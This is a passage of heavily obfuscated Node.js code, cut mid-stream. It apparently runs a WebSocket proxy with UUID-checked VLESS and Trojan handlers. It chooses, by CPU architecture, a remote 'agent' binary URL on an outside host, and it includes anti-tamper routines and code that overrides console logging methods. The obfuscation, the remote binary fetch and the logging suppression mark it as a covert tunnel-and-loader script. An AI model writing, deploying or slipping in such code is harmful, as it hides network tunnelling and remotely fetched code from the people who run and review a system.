-_0x50acf1._0xe9d782,_0x1dcc6a);}_0x351ee5[_0x2a0a8c(_0x26daaa._0x4c1774,0x2f,0xfb,_0x26daaa._0x749125)](_0x1826f1);},0x3f980+0x47561+-0x5afc1),_0x4af7b8[_0x3637df(_0x3b73bb._0x460954,_0x3b73bb._0x2ac54d,0x55e,_0x3b73bb._0x180f79)](_0x5d5f8a),_0x33e6e1['log'](_0x57b6b4(_0x3b73bb._0x48e230,0x593,_0x3b73bb._0x130f7a,_0x3b73bb._0xcf70e2)+_0x2cddd3);}})[_0x240500(_0x18f137._0x4e7e70,_0x18f137._0x4a8b4d,0x54b,_0x18f137._0x212fbd)](_0x629e31=>{const _0x427b3b={_0x2d37a2:0x53d,_0x2b74c2:0x568,_0x273896:0x4e5,_0x39a6ba:0x312,_0x5dbe4d:0x373,_0x51e578:0x353,_0x1a571d:0x2fe,_0x277b8c:0x4b2,_0x1176fd:0x4c6,_0x2be859:0x48c,_0x790cf1:0x4e5,_0x1fad00:0x567,_0x16195a:0x4e9,_0x37269c:0x4bb,_0x344807:0x4c4,_0x4f70f9:0x47a,_0x19f3dd:0x308,_0x598af5:0x438,_0x3592e2:0x303,_0x2084a1:0x38f,_0x2ab663:0x355,_0x3107c2:0x390,_0x426b17:0x380,_0x11a9d6:0x34e,_0x4620e8:0x3b7,_0x165f72:0x477,_0x591283:0x4a3,_0x45396b:0x4ef,_0x280355:0x467,_0x5961c1:0x4bd,_0x2191ba:0x502,_0x3dd797:0x4a1,_0x5664e0:0x59a,_0x25287a:0x5ac,_0xfbb398:0x5cc,_0x530369:0x368,_0x1cfc38:0x2aa,_0x18c074:0x2fc,_0x44ff87:0x3ea,_0x527873:0x3ed,_0x5c0527:0x471,_0x3c10f5:0x4e2,_0x1c3bec:0x586,_0x2d61f5:0x507,_0x3af35d:0x4bd,_0x6378d5:0x4bd,_0x527b48:0x505,_0x56f39d:0x578},_0x472ddd={_0x2fe7ee:0xdc},_0x2b6e60={_0x2da68c:0x172,_0x66913a:0x160,_0x3824ae:0x2d7},_0x24d4ce={_0x5caf3c:0x8f,_0x14101d:0x213},_0x182e77={_0x1ef63d:0x33b,_0x2f5f7b:0x298,_0x379999:0x2a6,_0x46cb04:0x2c9},_0x583142={_0x4df907:0x97},_0x4832b3={_0x11deab:0x2b4,_0x1b81ac:0x3a9,_0x958ef6:0x358},_0x42485e={_0x462fc6:0x1c4};function _0x1db435(_0x5aab0d,_0x366a4b,_0x970ecf,_0x336159){return _0x4a9935(_0x336159,_0x366a4b-_0x232351._0x12b009,_0x970ecf-_0x232351._0x4368d5,_0x970ecf-_0x232351._0x17af85);}const _0x3dbf0f={'iMOst':function(_0x272dcc,_0x3a97d4){function _0xbb2632(_0x3af43b,_0x272dc5,_0xb1cc9c,_0x2bce17){return _0x84e0(_0x272dc5- -_0x42485e._0x462fc6,_0x3af43b);}return _0x4af7b8[_0xbb2632(0x87,0x11b,0xd5,_0x47b0a6._0x41ff68)](_0x272dcc,_0x3a97d4);},'cfQdY':function(_0x1197de,_0x2c84db){const _0xe16d5c={_0x272884:0x2b};function _0x3a3d30(_0x275da6,_0x30edad,_0x5bd71c,_0xef5af6){return _0x84e0(_0x5bd71c-_0xe16d5c._0x272884,_0xef5af6);}return _0x4af7b8[_0x3a3d30(_0x4832b3._0x11deab,_0x4832b3._0x1b81ac,_0x4832b3._0x958ef6,0x319)](_0x1197de,_0x2c84db);},'KvuFM':function(_0x15ad5e,_0x2641e0){const _0xe6da36={_0x5a7c17:0x21e};function _0x4a3762(_0x1bcfc0,_0x1c11aa,_0x176e4a,_0x218a93){return _0x84e0(_0x1bcfc0- -_0xe6da36._0x5a7c17,_0x218a93);}return _0x4af7b8[_0x4a3762(-_0x9da135._0x227f44,0x34,-_0x9da135._0x2eda3e,-_0x9da135._0x3b1a96)](_0x15ad5e,_0x2641e0);},'dBMsz':function(_0x22cc00){function _0x5db1ef(_0x5c21e5,_0x3ea246,_0x532429,_0x1ed56a){return _0x84e0(_0x3ea246-_0x583142._0x4df907,_0x1ed56a);}return _0x4af7b8[_0x5db1ef(_0x182e77._0x1ef63d,_0x182e77._0x2f5f7b,_0x182e77._0x379999,_0x182e77._0x46cb04)](_0x22cc00);},'WeLpO':_0x4af7b8[_0xbf327f(0x244,_0x3a8512._0x45ca0e,_0x3a8512._0x386173,_0x3a8512._0x3bc1d7)],'FbImK':function(_0x4c2536,_0x4c2ab6){const _0x1534f8={_0x3137f6:0x14b,_0x45224e:0x176};function _0x361fb4(_0x5aae6e,_0x4dfad5,_0x27520a,_0x4f96c9){return _0xbf327f(_0x5aae6e,_0x4dfad5-_0x1534f8._0x3137f6,_0x27520a-_0x1534f8._0x45224e,_0x4f96c9-0x307);}return _0x4af7b8[_0x361fb4(_0x5d5e12._0x6fcc17,0x5ce,_0x5d5e12._0x2456eb,_0x5d5e12._0xa2b9c0)](_0x4c2536,_0x4c2ab6);},'vUBrK':_0x4af7b8['ePpun']},_0x2886ff={};function _0xbf327f(_0x49ce0b,_0x1be59c,_0x2ff4f6,_0x9182fa){return _0x4a9935(_0x49ce0b,_0x1be59c-0x1bb,_0x2ff4f6-_0x24d4ce._0x5caf3c,_0x9182fa-_0x24d4ce._0x14101d);}_0x2886ff[_0x1db435(0xf7,_0x3a8512._0x2bd06c,_0x3a8512._0x4f00f7,_0x3a8512._0x5c1ed2)]=_0x5db5e7,_0x2886ff['port']=_0x3ad347,net[_0xbf327f(_0x3a8512._0x44c349,_0x3a8512._0x7adcdf,0x294,_0x3a8512._0x8a1ed)](_0x2886ff,function(){function _0xa73ba2(_0x39f01e,_0x59091e,_0x5627a5,_0x3c7a84){return _0xbf327f(_0x39f01e,_0x59091e-_0x2b6e60._0x2da68c,_0x5627a5-_0x2b6e60._0x66913a,_0x59091e-_0x2b6e60._0x3824ae);}function _0x3f75ac(_0x2864e8,_0x38354e,_0xac69a7,_0x552050){return _0x1db435(_0x2864e8-0x15b,_0x38354e-_0x472ddd._0x2fe7ee,_0x552050-0x21d,_0x38354e);}if(_0x3dbf0f['iMOst'](_0xa73ba2(_0x427b3b._0x2d37a2,0x4ef,_0x427b3b._0x2b74c2,_0x427b3b._0x273896),_0x3dbf0f[_0x3f75ac(_0x427b3b._0x39a6ba,_0x427b3b._0x5dbe4d,_0x427b3b._0x51e578,_0x427b3b._0x1a571d)]))_0x3dbf0f[_0xa73ba2(_0x427b3b._0x277b8c,_0x427b3b._0x1176fd,_0x427b3b._0x2be859,_0x427b3b._0x790cf1)](_0x37f3eb,_0x44e0ab[_0xa73ba2(_0x427b3b._0x1fad00,_0x427b3b._0x16195a,0x481,0x4c6)])&&this['write'](_0x44e0ab[_0x3f75ac(0x44d,0x472,0x466,0x3f5)](_0x37f3eb)),_0x553d85['on'](_0x3dbf0f[_0xa73ba2(_0x427b3b._0x37269c,_0x427b3b._0x344807,_0x427b3b._0x4f70f9,0x4af)],()=>{})[_0x3f75ac(_0x427b3b._0x19f3dd,_0x427b3b._0x598af5,_0x427b3b._0x3592e2,_0x427b3b._0x2084a1)](this)['on'](_0x3dbf0f[_0x3f75ac(0x2c2,0x29f,_0x427b3b._0x2ab663,0x317)],()=>{})[_0x3f75ac(0x3a2,_0x427b3b._0x3107c2,_0x427b3b._0x426b17,_0x427b3b._0x2084a1)](_0x553d85);else{const _0x394bf3=_0x5af1c7[_0x3f75ac(_0x427b3b._0x11a9d6,0x45d,0x45b,_0x427b3b._0x4620e8)];if(_0x3dbf0f[_0xa73ba2(_0x427b3b._0x165f72,_0x427b3b._0x591283,0x4ef,_0x427b3b._0x45396b)](_0x394bf3[_0xa73ba2(_0x427b3b._0x280355,_0x427b3b._0x5961c1,_0x427b3b._0x2191ba,_0x427b3b._0x3dd797)],-0x1be7*0x1+0x2c8*-0x9+0x34ef)&&_0x394bf3[_0xa73ba2(0x508,_0x427b3b._0x5664e0,_0x427b3b._0x25287a,_0x427b3b._0xfbb398)]&&_0x3dbf0f[_0x3f75ac(0x346,_0x427b3b._0x530369,_0x427b3b._0x1cfc38,_0x427b3b._0x18c074)](_0x394bf3[_0x3f75ac(0x37f,0x465,_0x427b3b._0x44ff87,_0x427b3b._0x527873)]['length'],0x1621+0x3*0x67f+-0x299e)){const _0x1ddf53=_0x394bf3['Answer'][_0xa73ba2(0x52f,0x504,_0x427b3b._0x5c0527,_0x427b3b._0x3c10f5)](_0x2146ca=>_0x2146ca[_0xa73ba2(0x5c6,0x594,0x5cc,0x56d)]===0x1662+-0x24a7+-0xcb*-0x12);if(_0x1ddf53){_0x3dbf0f[_0xa73ba2(_0x427b3b._0x1c3bec,_0x427b3b._0x2d61f5,_0x427b3b._0x3af35d,_0x427b3b._0x6378d5)](_0x48a61d,_0x1ddf53['data']);return;}}_0x3dbf0f[_0xa73ba2(_0x427b3b._0x527b48,0x54d,_0x427b3b._0x56f39d,0x5de)](_0x2ced7c);}})['on'](_0x4af7b8['ePpun'],()=>{});}),!![];}else _0x3d7f1f[_0x4a9935(_0x18f137._0x2348d5,0x13d,_0x18f137._0x5a4f7c,_0x18f137._0x35fff6)]();}catch(_0x19f231){if(_0x4af7b8[_0x240500(0x480,0x4d4,_0x18f137._0x4822b2,_0x18f137._0x3a2d24)](_0x4af7b8[_0x4a9935(0xfb,_0x18f137._0x5a3795,_0x18f137._0x2f9e53,_0x18f137._0x585d54)],_0x4af7b8[_0x240500(_0x18f137._0x490701,_0x18f137._0xd97135,_0x18f137._0x32f561,0x453)]))_0x510f23[_0x4a9935(_0x18f137._0x4118a5,_0x18f137._0x141ba0,_0x18f137._0xe7f248,_0x18f137._0x295ff2)](_0x240500(_0x18f137._0x58856e,_0x18f137._0x4743a2,0x480,0x3f8)+_0x24c4bc);else return![];}}wss['on'](_0x421fd5(-0x126,-0x139,-0xda,-0xf9),(_0x182b9c,_0x20014f)=>{const _0x36bdef={_0x2dcccf:0x8e,_0x2166d8:0x80,_0x12dde5:0xb,_0x1b4672:0x1f,_0x2e32e8:0x71,_0x5d6e57:0x63a,_0x4cd4e6:0x586,_0x79c154:0x543,_0x1ebfee:0x522,_0x4fc949:0x549,_0x1a0955:0x577,_0x467e93:0xeb,_0x49f576:0xb4,_0x3c11df:0x12e},_0x494971={_0x302d0b:0x28,_0x56c6ed:0x93,_0x27cef5:0xc7,_0x14f034:0x16f,_0x56c7da:0xe8,_0x16a2a3:0x99,_0xc1584f:0x13d,_0x3c7879:0xa2,_0x33a693:0x18e,_0x38fae7:0xd7,_0x2e9d40:0xc8,_0xa1204b:0x343,_0x1c2742:0x3a6,_0x3d8e70:0x416,_0x14ffb3:0x3e6,_0x2af79c:0x3fd,_0x2c5b74:0x45f,_0x10e0ff:0x42c,_0x31954f:0x452,_0xba916a:0x4db,_0x56ad44:0x4a8,_0x2f5987:0x3fb,_0x3c32ae:0x436,_0x26e1d1:0x3dd,_0x465e95:0x4bb,_0x335f50:0x488,_0x4084f6:0x457,_0x2d8324:0x11b,_0x54f24a:0x238},_0x5642a8={_0xef2b59:0xc,_0x32e9f4:0xce,_0x13f654:0x12a},_0x1d574e={_0x3a023e:0xf7,_0x35668a:0x188},_0x352154={_0x4831ae:0x671};function _0x1599af(_0x2ffa58,_0x23f58c,_0x339ccd,_0x4d5257){return _0x421fd5(_0x2ffa58-0x1a0,_0x4d5257,_0x339ccd-_0x352154._0x4831ae,_0x4d5257-0x13d);}function _0x491645(_0xbea296,_0x253f3d,_0xc482f0,_0x4e2dd2){return _0x279f0a(_0xbea296,_0x253f3d-_0x1d574e._0x3a023e,_0x253f3d-0x171,_0x4e2dd2-_0x1d574e._0x35668a);}const _0x36a1be={'xvoST':function(_0x4f1089,_0x561cca){return _0x4f1089(_0x561cca);},'YEwaI':function(_0x96debb,_0x4f5196){return _0x96debb===_0x4f5196;},'SvHvz':_0x491645(_0x36bdef._0x2dcccf,0x80,0xbf,0x38),'oqPPT':function(_0x4f3879,_0x47c2b3){return _0x4f3879===_0x47c2b3;},'ucros':function(_0x15d4cd,_0x519bde,_0x2f75f0){return _0x15d4cd(_0x519bde,_0x2f75f0);},'pArzf':_0x491645(_0x36bdef._0x2166d8,-_0x36bdef._0x12dde5,_0x36bdef._0x1b4672,-_0x36bdef._0x2e32e8)},_0x1ac704=_0x20014f['url']||'';_0x182b9c[_0x1599af(0x5c1,_0x36bdef._0x5d6e57,_0x36bdef._0x4cd4e6,_0x36bdef._0x79c154)](_0x36a1be[_0x1599af(_0x36bdef._0x1ebfee,0x496,_0x36bdef._0x4fc949,_0x36bdef._0x1a0955)],_0x1791c8=>{const _0x27f0f3={_0x492323:0x5e,_0x29b856:0x17f,_0x483dea:0x67b};function _0x519573(_0x3e77e7,_0x252b16,_0xefb36f,_0x23ad32){return _0x1599af(_0x3e77e7-_0x27f0f3._0x492323,_0x252b16-_0x27f0f3._0x29b856,_0xefb36f- -_0x27f0f3._0x483dea,_0x252b16);}function _0x415f79(_0x8d1413,_0x48af27,_0x3e5f91,_0xd1bcff){return _0x1599af(_0x8d1413-_0x5642a8._0xef2b59,_0x48af27-_0x5642a8._0x32e9f4,_0xd1bcff- -_0x5642a8._0x13f654,_0x48af27);}if(_0x36a1be[_0x519573(-_0x494971._0x302d0b,-_0x494971._0x56c6ed,-_0x494971._0x27cef5,-_0x494971._0x14f034)](_0x36a1be[_0x519573(-_0x494971._0x56c7da,-_0x494971._0x16a2a3,-_0x494971._0xc1584f,-_0x494971._0x3c7879)],_0x36a1be[_0x519573(-_0x494971._0x33a693,-_0x494971._0x38fae7,-_0x494971._0xc1584f,-_0x494971._0x2e9d40)])){if(_0x1791c8[_0x415f79(0x325,_0x494971._0xa1204b,0x3bb,_0x494971._0x1c2742)]>0x10ff+0x1339+-0x269*0xf&&_0x36a1be['oqPPT'](_0x1791c8[-0x56*-0x9+-0x296*-0x9+0xc*-0x231],-0x9e7+0x1d*0x19+0x712)){const _0x332422=_0x1791c8[_0x415f79(_0x494971._0x3d8e70,_0x494971._0x14ffb3,_0x494971._0x2af79c,_0x494971._0x2c5b74)](0x198c+-0x1e31+-0x5*-0xee,0x2*-0xc37+0x128a+0x1*0x5f5),_0x2dd747=_0x332422['every']((_0x23abe6,_0xe6fabe)=>_0x23abe6==parseInt(uuid['substr'](_0xe6fabe*(-0x10b3+-0x3*0x56d+0x20fc),-0xed8+-0x1a92+0x296c),0x2*0xd4f+-0x6d4+-0x13ba));if(_0x2dd747){!handleVlessConnection(_0x182b9c,_0x1791c8)&&_0x182b9c[_0x415f79(_0x494971._0x10e0ff,_0x494971._0x31954f,_0x494971._0xba916a,_0x494971._0x56ad44)]();return;}}!_0x36a1be[_0x415f79(_0x494971._0x2f5987,_0x494971._0x3c32ae,_0x494971._0x26e1d1,0x47d)](handleTrojanConnection,_0x182b9c,_0x1791c8)&&_0x182b9c['close']();}else{const _0x4e6560=_0x96b825[_0x415f79(0x4ac,_0x494971._0x465e95,_0x494971._0x335f50,_0x494971._0x4084f6)]['find'](_0x13de74=>_0x13de74[_0x519573(-0xf5,-0x140,-0x100,-0x18f)]===-0x26*0xfe+0x68a+0x4f*0x65);if(_0x4e6560){_0x36a1be[_0x519573(-_0x494971._0x2d8324,-_0x494971._0x54f24a,-0x19a,-0x165)](_0x4cc867,_0x4e6560['data']);return;}}})['on'](_0x491645(_0x36bdef._0x467e93,_0x36bdef._0x49f576,_0x36bdef._0x3c11df,0xf1),()=>{});});function _0x84e0(_0x31624a,_0x1b8ca7){const _0x536c82=_0x36d7();return _0x84e0=function(_0x4f65df,_0x413954){_0x4f65df=_0x4f65df-(0x123a*0x1+-0xb*0xdb+-0x706);let _0x5bbe8b=_0x536c82[_0x4f65df];if(_0x84e0['dQZwNI']===undefined){var _0xce8a77=function(_0x14e40c){const _0x47bced='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x17fc45='',_0x1ed8d6='',_0x422fbd=_0x17fc45+_0xce8a77;for(let _0x3bebd9=0x25d6+-0x25f8+0x22,_0x23ef7c,_0xf4f3c0,_0x24dd09=-0x526+0x23ca+-0xf52*0x2;_0xf4f3c0=_0x14e40c['charAt'](_0x24dd09++);~_0xf4f3c0&&(_0x23ef7c=_0x3bebd9%(0x136f+-0x13f0+0x1*0x85)?_0x23ef7c*(-0x31d*0x1+0x5*0x7ca+0x1*-0x2395)+_0xf4f3c0:_0xf4f3c0,_0x3bebd9++%(0xb85+0x2*0xc21+-0x23c3))?_0x17fc45+=_0x422fbd['charCodeAt'](_0x24dd09+(-0x1*-0xfa1+-0x16ad+0x716*0x1))-(-0xc7*0x1c+-0x9db+-0x655*-0x5)!==0x2636+-0x1*0x1066+-0x15d*0x10?String['fromCharCode'](0x22d1+-0x9e*-0xc+-0x293a&_0x23ef7c>>(-(0xd*0x28d+0x1237+-0x2*0x19af)*_0x3bebd9&-0x1*-0x20b9+0x1*-0x2169+0xb6)):_0x3bebd9:-0x141*0xd+-0x17*0x18d+-0x33f8*-0x1){_0xf4f3c0=_0x47bced['indexOf'](_0xf4f3c0);}for(let _0x5efae4=-0xb3c+-0xa7*0x3b+0x31b9,_0x138165=_0x17fc45['length'];_0x5efae4<_0x138165;_0x5efae4++){_0x1ed8d6+='%'+('00'+_0x17fc45['charCodeAt'](_0x5efae4)['toString'](0x1ae2+0x103d*-0x2+0x5a8))['slice'](-(-0x1bd5+-0x1957+0x8dd*0x6));}return decodeURIComponent(_0x1ed8d6);};_0x84e0['VpaKtN']=_0xce8a77,_0x31624a=arguments,_0x84e0['dQZwNI']=!![];}const _0x232aa6=_0x536c82[0xb1*0x37+0x2e*0xb2+0x4603*-0x1],_0x33e6bd=_0x4f65df+_0x232aa6,_0x157863=_0x31624a[_0x33e6bd];if(!_0x157863){const _0x333b78=function(_0x2b6d15){this['pzsnGS']=_0x2b6d15,this['PBwcnJ']=[0xb52+0x2dd*-0xa+0x1151,-0x1426+-0xde7+-0x220d*-0x1,-0x19cb+0x1*-0x17eb+-0x586*-0x9],this['wmpgQK']=function(){return'newState';},this['eXcrqP']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['oMdGlb']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x333b78['prototype']['jSOUZo']=function(){const _0x4a37f4=new RegExp(this['eXcrqP']+this['oMdGlb']),_0x5a0b38=_0x4a37f4['test'](this['wmpgQK']['toString']())?--this['PBwcnJ'][0x2603+0x1832+-0x3e34]:--this['PBwcnJ'][-0x1cb5+-0x83*-0x12+0x137f];return this['GjyjfJ'](_0x5a0b38);},_0x333b78['prototype']['GjyjfJ']=function(_0xa69ba1){if(!Boolean(~_0xa69ba1))return _0xa69ba1;return this['GTRAic'](this['pzsnGS']);},_0x333b78['prototype']['GTRAic']=function(_0x2362d3){for(let _0xc35603=-0x14*0x6b+0x32f+0x52d,_0x444ed7=this['PBwcnJ']['length'];_0xc35603<_0x444ed7;_0xc35603++){this['PBwcnJ']['push'](Math['round'](Math['random']())),_0x444ed7=this['PBwcnJ']['length'];}return _0x2362d3(this['PBwcnJ'][0xd*-0x24b+0x1*0xc73+0x2c*0x65]);},new _0x333b78(_0x84e0)['jSOUZo'](),_0x5bbe8b=_0x84e0['VpaKtN'](_0x5bbe8b),_0x31624a[_0x33e6bd]=_0x5bbe8b;}else _0x5bbe8b=_0x157863;return _0x5bbe8b;},_0x84e0(_0x31624a,_0x1b8ca7);}const getDownloadUrl=()=>{const _0xafb63d={_0x5eff65:0x6bc,_0x56d4f9:0x650,_0x12fb14:0x6ac,_0x242fe0:0x67a,_0xb8c971:0x5ad,_0x28a49:0x5f6,_0x3fba0a:0x3c0,_0x705927:0x454,_0x5bd5e3:0x3cc,_0xebfea9:0x32b,_0x41b9bb:0x34d,_0x5cf525:0x340,_0x5e3fc9:0x414,_0x15d619:0x3e5,_0x16b6e8:0x450,_0x24143f:0x47b,_0x53e067:0x487,_0x3f6af7:0x402,_0x3b0a2c:0x400,_0x5e8f1f:0x65f,_0x51c4d3:0x5ac,_0x299041:0x673,_0x1cf509:0x600,_0x25f408:0x387,_0x42b2f2:0x411,_0x5ee7dd:0x37c,_0x1948f7:0x5ee,_0x20b7bc:0x611,_0x498398:0x2ec,_0x439969:0x336,_0x3b9ba6:0x3a1,_0xfc66b:0x5fd,_0x3abea9:0x5be,_0x328fe7:0x5d6,_0x4c4f79:0x61d,_0x4d47d5:0x35d,_0x2358df:0x3df,_0x1177fe:0x49a,_0x358857:0x409,_0x39aa05:0x60d,_0x5d1ab5:0x39f,_0x3d01d2:0x3e5,_0x40f43b:0x384,_0x3b315d:0x506,_0x249d00:0x5ce,_0x24189b:0x4d4,_0x5273ee:0x2f7,_0x418252:0x68b,_0x257453:0x659,_0x1a1986:0x681,_0x3a13c3:0x603,_0x6cde42:0x632,_0x517ae5:0x569,_0x5110a2:0x729,_0x4dde47:0x692,_0x529bb6:0x585,_0x5c6864:0x5a3,_0x3ac12b:0x5e4,_0xb4b812:0x2b4,_0x53fc6d:0x30d,_0x5a2bbc:0x358,_0x53ef4a:0x396,_0x7f09bf:0x34a,_0x2063c8:0x2ec,_0x50da37:0x349,_0x4795df:0x2f1,_0x147ddc:0x33d,_0x49a211:0x349,_0x5f273e:0x356,_0x465daa:0x36b,_0x4e48be:0x3d6,_0x3f4b66:0x6e5,_0x516865:0x63f,_0xbfcedd:0x6a7,_0x5d694a:0x439,_0x1b1d89:0x436,_0x1f1d75:0x438,_0xc95846:0x401,_0x1c8093:0x3fe,_0x5aebbe:0x3e1,_0x5c47d6:0x382,_0x264e2e:0x541,_0x3541a8:0x563,_0xcf35a4:0x4ac,_0x5abc3f:0x4e7,_0x455a9e:0x553,_0x4e46fc:0x3ca,_0x234ba6:0x39f,_0x2abea1:0x362,_0x180467:0x41e,_0x50315a:0x4a5,_0x123936:0x40c,_0x3ee4d6:0x347,_0x3f6b9a:0x3c3,_0x199ca1:0x31f,_0x84c039:0x4cf,_0x3ba2d1:0x5f6,_0xcde8e5:0x554,_0x23ee1c:0x370,_0x50d665:0x32a,_0x35264b:0x3e5,_0x1a9ee3:0x3c6,_0x392449:0x2f4,_0x2930f8:0x5cb,_0x4fe1b8:0x4a0,_0x567782:0x509,_0x4db4ba:0x554,_0x14568e:0x32b,_0x85adf3:0x44c,_0x589860:0x412,_0x362662:0x3d4,_0x4cfa9c:0x30c,_0x1fc0e4:0x381,_0x519627:0x3f4,_0x1cacdf:0x4b5,_0x27e747:0x5d5,_0x38b080:0x549,_0x46e6b3:0x55e,_0x4b59c3:0x406,_0xd6ac56:0x41e,_0x72213b:0x331,_0x4e6cb9:0x3ce},_0x26ae20={_0x169e85:0x17c,_0x34a565:0x503,_0x1811af:0x174},_0x53f82f={_0x70a7fa:0xaf,_0x1af4e2:0x738,_0x104090:0x63};function _0x53b04a(_0x46d43f,_0x47c064,_0x141d51,_0x1cdfe3){return _0x421fd5(_0x46d43f-_0x53f82f._0x70a7fa,_0x46d43f,_0x1cdfe3-_0x53f82f._0x1af4e2,_0x1cdfe3-_0x53f82f._0x104090);}const _0x4d9e53={'qCrKU':function(_0x2caa96,_0x38caef){return _0x2caa96+_0x38caef;},'IOkia':_0x53b04a(_0xafb63d._0x5eff65,_0xafb63d._0x56d4f9,0x685,_0xafb63d._0x12fb14),'LZvco':_0x53b04a(0x5cf,_0xafb63d._0x242fe0,_0xafb63d._0xb8c971,_0xafb63d._0x28a49),'qACaF':function(_0x11a498){return _0x11a498();},'ydwjZ':_0x431215(_0xafb63d._0x3fba0a,0x385,_0xafb63d._0x705927,_0xafb63d._0x5bd5e3),'fFepn':_0x431215(0x340,_0xafb63d._0xebfea9,_0xafb63d._0x41b9bb,_0xafb63d._0x5cf525),'CIndI':_0x431215(0x43a,_0xafb63d._0x5e3fc9,_0xafb63d._0x15d619,_0xafb63d._0x16b6e8),'tQrCr':_0x431215(_0xafb63d._0x24143f,_0xafb63d._0x53e067,_0xafb63d._0x3f6af7,_0xafb63d._0x3b0a2c),'CBVDx':'trace','YwfEl':function(_0x5b75d4,_0x223ec7){return _0x5b75d4<_0x223ec7;},'kOfLA':_0x53b04a(_0xafb63d._0x5e8f1f,_0xafb63d._0x51c4d3,_0xafb63d._0x299041,_0xafb63d._0x1cf509),'jewwg':function(_0x24f666,_0x2581e4){return _0x24f666===_0x2581e4;},'sZRQA':function(_0x58ad61,_0x5291ce){return _0x58ad61===_0x5291ce;},'ZlOCY':_0x431215(0x311,_0xafb63d._0x25f408,_0xafb63d._0x42b2f2,_0xafb63d._0x5ee7dd),'YDSye':function(_0x9327de,_0x4501e5){return _0x9327de===_0x4501e5;},'mcIsO':'aarch64','wHNhg':function(_0x191f2c,_0x1076d0){return _0x191f2c!==_0x1076d0;},'uUAlx':_0x53b04a(_0xafb63d._0x1948f7,0x624,0x6b7,_0xafb63d._0x20b7bc),'REWDy':_0x431215(0x2ed,_0xafb63d._0x498398,_0xafb63d._0x439969,_0xafb63d._0x3b9ba6),'GyUMK':_0x53b04a(_0xafb63d._0xfc66b,_0xafb63d._0x3abea9,_0xafb63d._0x328fe7,_0xafb63d._0x4c4f79),'yyueY':function(_0x46170e,_0x2ae3f4){return _0x46170e!==_0x2ae3f4;},'lqCQl':_0x431215(_0xafb63d._0x4d47d5,_0xafb63d._0x2358df,_0xafb63d._0x1177fe,_0xafb63d._0x358857),'QBBmL':'https://amd64.ssss.nyc.mn/agent'},_0x593edf=os['arch']();function _0x431215(_0x2c6024,_0x2d7d9c,_0x5386a0,_0x50808a){return _0x421fd5(_0x2c6024-_0x26ae20._0x169e85,_0x5386a0,_0x50808a-_0x26ae20._0x34a565,_0x50808a-_0x26ae20._0x1811af);}if(_0x4d9e53[_0x53b04a(0x58d,0x628,0x65c,_0xafb63d._0x39aa05)](_0x593edf,'arm')||_0x4d9e53[_0x431215(_0xafb63d._0x5d1ab5,_0xafb63d._0x3d01d2,_0xafb63d._0x40f43b,_0xafb63d._0x3d01d2)](_0x593edf,_0x4d9e53['ZlOCY'])||_0x4d9e53[_0x53b04a(_0xafb63d._0x3b315d,_0xafb63d._0x249d00,_0xafb63d._0x24189b,0x580)](_0x593edf,_0x4d9e53[_0x431215(_0xafb63d._0x5273ee,0x35c,_0xafb63d._0x41b9bb,0x3a9)])){if(!NEZHA_PORT)return _0x4d9e53[_0x53b04a(_0xafb63d._0x418252,_0xafb63d._0x257453,_0xafb63d._0x1a1986,_0xafb63d._0x3a13c3)];else{if(_0x4d9e53['wHNhg'](_0x4d9e53['uUAlx'],_0x53b04a(_0xafb63d._0x20b7bc,_0xafb63d._0x6cde42,_0xafb63d._0x517ae5,_0xafb63d._0x20b7bc))){let _0x5602e5;try{const _0x46530f=_0x3d810c(CWUWUu[_0x53b04a(_0xafb63d._0x5110a2,0x5e8,0x6e2,_0xafb63d._0x4dde47)](CWUWUu[_0x53b04a(_0xafb63d._0x529bb6,_0xafb63d._0x5c6864,0x608,_0xafb63d._0x3ac12b)],CWUWUu[_0x431215(_0xafb63d._0xb4b812,0x2c9,_0xafb63d._0x53fc6d,_0xafb63d._0x5a2bbc)])+');');_0x5602e5=CWUWUu['qACaF'](_0x46530f);}catch(_0x5ee597){_0x5602e5=_0x210be4;}const _0x34c56a=_0x5602e5[_0x431215(_0xafb63d._0x53ef4a,_0xafb63d._0x7f09bf,_0xafb63d._0x2063c8,_0xafb63d._0x50da37)]=_0x5602e5[_0x431215(0x2de,_0xafb63d._0x4795df,_0xafb63d._0x147ddc,_0xafb63d._0x49a211)]||{},_0x288858=[CWUWUu[_0x431215(_0xafb63d._0x7f09bf,_0xafb63d._0x5f273e,_0xafb63d._0x465daa,_0xafb63d._0x4e48be)],CWUWUu['fFepn'],CWUWUu[_0x53b04a(_0xafb63d._0x3f4b66,_0xafb63d._0x516865,0x67b,_0xafb63d._0xbfcedd)],_0x431215(0x4b5,0x381,_0xafb63d._0x5d694a,_0xafb63d._0x1b1d89),_0x431215(_0xafb63d._0x1f1d75,0x3a6,0x47c,_0xafb63d._0xc95846),CWUWUu[_0x431215(0x373,_0xafb63d._0x1c8093,_0xafb63d._0x5aebbe,_0xafb63d._0x5c47d6)],CWUWUu[_0x53b04a(_0xafb63d._0x264e2e,0x549,0x4d4,_0xafb63d._0x3541a8)]];for(let _0x37c427=0xc*0xb7+0x1138+0xd*-0x1fc;CWUWUu[_0x53b04a(_0xafb63d._0xcf35a4,_0xafb63d._0x5abc3f,0x531,_0xafb63d._0x455a9e)](_0x37c427,_0x288858[_0x431215(_0xafb63d._0x4e46fc,0x38b,_0xafb63d._0x234ba6,_0xafb63d._0x2abea1)]);_0x37c427++){const _0x342a07=_0x1eb8c8[_0x431215(_0xafb63d._0x180467,_0xafb63d._0x50315a,0x466,_0xafb63d._0x123936)]['prototype'][_0x431215(0x334,_0xafb63d._0x3ee4d6,_0xafb63d._0x3f6b9a,_0xafb63d._0x199ca1)](_0x10732c),_0x2f6ff7=_0x288858[_0x37c427],_0x170167=_0x34c56a[_0x2f6ff7]||_0x342a07;_0x342a07['__proto__']=_0x11639a[_0x53b04a(_0xafb63d._0x84c039,0x589,_0xafb63d._0x3ba2d1,_0xafb63d._0xcde8e5)](_0x569ef4),_0x342a07[_0x431215(_0xafb63d._0x23ee1c,0x33f,_0xafb63d._0x50d665,_0xafb63d._0x5d1ab5)]=_0x170167[_0x431215(_0xafb63d._0x35264b,_0xafb63d._0x1a9ee3,_0xafb63d._0x392449,0x39f)][_0x53b04a(_0xafb63d._0x2930f8,_0xafb63d._0x4fe1b8,_0xafb63d._0x567782,_0xafb63d._0x4db4ba)](_0x170167),_0x34c56a[_0x2f6ff7]=_0x342a07;}}else return _0x4d9e53['REWDy'];}}else 